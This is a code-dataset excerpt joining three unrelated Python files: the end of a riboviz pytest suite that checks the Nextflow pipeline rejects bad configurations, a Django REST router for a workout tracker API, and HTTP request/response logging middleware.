config = yaml.load(f, yaml.SafeLoader)
config[params.MULTIPLEX_FQ_FILES] = ["foo1.fq", "foo2.fq"]
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_no_sample_sheet(tmp_file):
"""
Test that providing :py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
but no :py:const:`riboviz.params.SAMPLE_SHEET` returns a non-zero
exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
del config[params.SAMPLE_SHEET]
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_sample_sheet_not_found(tmp_file):
"""
Test that providing :py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
and a non-existent :py:const:`riboviz.params.SAMPLE_SHEET` file
returns a non-zero exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.SAMPLE_SHEET] = "foo.tsv"
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
@pytest.mark.parametrize("parameter",
[params.INPUT_DIR,
params.RRNA_FASTA_FILE,
params.ORF_FASTA_FILE,
params.ORF_GFF_FILE,
params.ADAPTERS,
params.ORF_INDEX_PREFIX,
params.RRNA_INDEX_PREFIX,
params.T_RNA_FILE,
params.CODON_POSITIONS_FILE])
def test_no_mandatory_parameter(tmp_file, parameter):
"""
Test that not providing a mandatory parameter returns a non-zero
exit code.
This test also covers the case where if one of
:py:const:`riboviz.params.T_RNA_FILE` or
:py:const:`riboviz.params.CODON_POSITIONS_FILE` is provided then
then the other must be too.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
:param parameter: Parameter
:type parameter: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
del config[parameter]
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
@pytest.mark.parametrize("parameter",
[params.INPUT_DIR,
params.RRNA_FASTA_FILE,
params.ORF_FASTA_FILE,
params.ORF_GFF_FILE,
params.FEATURES_FILE,
params.T_RNA_FILE,
params.CODON_POSITIONS_FILE,
params.ASITE_DISP_LENGTH_FILE])
def test_file_not_found(tmp_file, parameter):
"""
Test that providing a missing file for a file parameter returns a
non-zero exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
:param parameter: Parameter
:type parameter: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[parameter] = "foo"
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_extract_umis_no_umi_regexp(tmp_file):
"""
Test that if :py:const:`riboviz.params.EXTRACT_UMIS` is `TRUE`
but no :py:const:`riboviz.params.UMI_REGEXP` returns a non-zero
exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.SIMDATA_UMI_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
del config[params.UMI_REGEXP]
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
@pytest.mark.parametrize("parameter",
[(params.BUFFER, -1),
(params.COUNT_THRESHOLD, -1),
(params.NUM_PROCESSES, 0),
(params.MIN_READ_LENGTH, 0),
(params.MAX_READ_LENGTH, 0)], ids=str)
def test_invalid_value(tmp_file, parameter):
"""
Test that providing invalid values for a parameter returns a
non-zero exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
:param parameter: Parameter and invalid value
:type parameter: tuple(str or unicode, int)
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
name, value = parameter
config[name] = value
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_max_read_length_less_min(tmp_file):
"""
Test that :py:const:`riboviz.params.MAX_READ_LENGTH` less than
:py:const:`riboviz.params.MIN_READ_LENGTH` returns a non-zero exit
code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.MIN_READ_LENGTH] = 10
config[params.MAX_READ_LENGTH] = 9
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_build_indices_false_no_such_index_dir(tmp_file):
"""
Test that :py:const:`riboviz.params.BUILD_INDICES` is false
and no such index directory :py:const:`riboviz.params.INDEX_DIR`
returns a non-zero exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.BUILD_INDICES] = False
config[params.INDEX_DIR] = "NoSuchDirectory"
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_build_indices_false_no_such_orf_index_prefix(tmp_file, tmp_dir):
"""
Test that :py:const:`riboviz.params.BUILD_INDICES` is false
and no such files with prefixe
:py:const:`riboviz.params.ORF_INDEX_PREFIX` returns a non-zero
exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
:param tmp_dir: Path to temporary directory
:type tmp_dir: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.BUILD_INDICES] = False
config[params.INDEX_DIR] = tmp_dir
# Create empty file with rRNA index prefix, so check for that
# file will succeed.
with open(os.path.join(tmp_dir,
hisat2.HT2_FORMAT.format(
config[params.RRNA_INDEX_PREFIX],
1)), 'w') as f:
pass
config[params.ORF_INDEX_PREFIX] = "NoSuchOrfPrefix"
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_build_indices_false_no_such_rrna_index_prefix(tmp_file, tmp_dir):
"""
Test that :py:const:`riboviz.params.BUILD_INDICES` is false
and no such files with prefixe
:py:const:`riboviz.params.RRNA_INDEX_PREFIX` returns a non-zero
exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
:param tmp_dir: Path to temporary directory
:type tmp_dir: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.BUILD_INDICES] = False
config[params.INDEX_DIR] = tmp_dir
# Create empty file with ORF index prefix, so check for that
# file will succeed.
with open(os.path.join(tmp_dir,
hisat2.HT2_FORMAT.format(
config[params.ORF_INDEX_PREFIX],
1)), 'w') as f:
pass
config[params.RRNA_INDEX_PREFIX] = "NoSuchRrnaPrefix"
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_validate_skip_inputs_fq_files_not_found(tmp_file):
"""
Test that non-existent :py:const:`riboviz.params.FQ_FILES` files
in the presence of both :py:const:`riboviz.params.VALIDATE_ONLY`
and :py:const:`riboviz.params.SKIP_INPUTS` returns a zero exit
code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.FQ_FILES] = {
"foo1": "foo1.fq", "foo2": "foo2.fq"
}
config[params.VALIDATE_ONLY] = True
config[params.SKIP_INPUTS] = True
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code == 0, \
"Unexpected exit code %d" % exit_code
def test_validate_skip_inputs_multiplex_fq_files_not_found(tmp_file):
"""
Test that non-existent
:py:const:`riboviz.params.MULTIPLEX_FQ_FILES` in the presence of
both :py:const:`riboviz.params.VALIDATE_ONLY` and
:py:const:`riboviz.params.SKIP_INPUTS` returns a zero exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.MULTIPLEX_FQ_FILES] = ["foo1.fq", "foo2.fq"]
config[params.VALIDATE_ONLY] = True
config[params.SKIP_INPUTS] = True
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code == 0, \
"Unexpected exit code %d" % exit_code
def test_validate_skip_inputs_sample_sheet_not_found(tmp_file):
"""
Test that providing :py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
and a non-existent :py:const:`riboviz.params.SAMPLE_SHEET` file
in the presence of both :py:const:`riboviz.params.VALIDATE_ONLY`
and :py:const:`riboviz.params.SKIP_INPUTS` returns a zero exit
code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.SAMPLE_SHEET] = "foo.tsv"
config[params.VALIDATE_ONLY] = True
config[params.SKIP_INPUTS] = True
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code == 0, \
"Unexpected exit code %d" % exit_code
| StarcoderdataPython |
4815374 | <gh_stars>0
from django.conf.urls import url
from app import views
from rest_framework import routers
from django.conf.urls import url, include
from app import views
router = routers.DefaultRouter()
router.register(r'users', views.UsersView)
# router.register(r'groups', views.GroupsView)
# router.register(r'permissions', views.PermissionsView)
router.register(r'exercise_types', views.ExerciseTypesView)
router.register(r'muscle_groups', views.MuscleGroupsView)
router.register(r'muscles', views.MusclesView)
router.register(r'exercise_lifts', views.ExerciseLiftsView)
router.register(r'workout_trackers', views.WorkoutTrackersView)
router.register(r'workout_tracker_exercises', views.WorkoutTrackerExercisesView)
# router.register(r'login_user', views.login_user)
# router.register(r'register_user', views.register_user)
# router.register(r'api-auth', include('rest_framework.urls', namespace='rest_framework'))
urlpatterns = [
url(r'^', include(router.urls)),
url(r'^login_user/$', views.login_user),
url(r'^register_user/$', views.register_user),
# url(r'^new_workout/$', views.create_new_workout),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
]
| StarcoderdataPython |
12801436 | <filename>hs_formation/middleware/logger.py
from ..formation import (
_REQ_HTTP,
_RES_HTTP,
_CONTEXT,
_REQ_DURATION,
)
from toolz.curried import valfilter
def request_logger(logger):
no_nones = valfilter(lambda x: x)
def request_logger_middleware(ctx, next):
req = ctx[_REQ_HTTP]
context = ctx.get(_CONTEXT, {})
msg = "request.http"
log = logger.bind(**context)
log.info(msg, url=req.url, method=req.method, params=no_nones(req.params))
log.debug(msg, headers=req.headers)
ctx = next(ctx)
res = ctx[_RES_HTTP]
msg = "response.http"
log.info(
msg,
url=res.request.url,
status=res.status_code,
method=res.request.method,
elapsed=res.elapsed,
size=len(res.content),
duration_us=ctx.get(_REQ_DURATION, None),
)
log.debug(msg, headers=res.headers)
return ctx
return request_logger_middleware
def async_request_logger(logger):
no_nones = valfilter(lambda x: x)
async def request_logger_middleware(ctx, next):
req = ctx[_REQ_HTTP]
context = ctx.get(_CONTEXT, {})
msg = "before request.http"
log = await logger.bind(**context)
await log.info(msg, url=req.url, method=req.method, params=no_nones(req.params))
await log.debug(msg, headers=req.headers)
ctx = await next(ctx)
res = ctx[_RES_HTTP]
msg = "after response.http"
await log.info(
msg,
url=res.request.url,
status=res.status_code,
method=res.request.method,
elapsed=res.elapsed,
size=len(res.parsed_content if hasattr(res, "parsed_content") else res.content),
duration_us=ctx.get(_REQ_DURATION, None),
)
await log.debug(msg, headers=res.headers)
return ctx
return request_logger_middleware
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.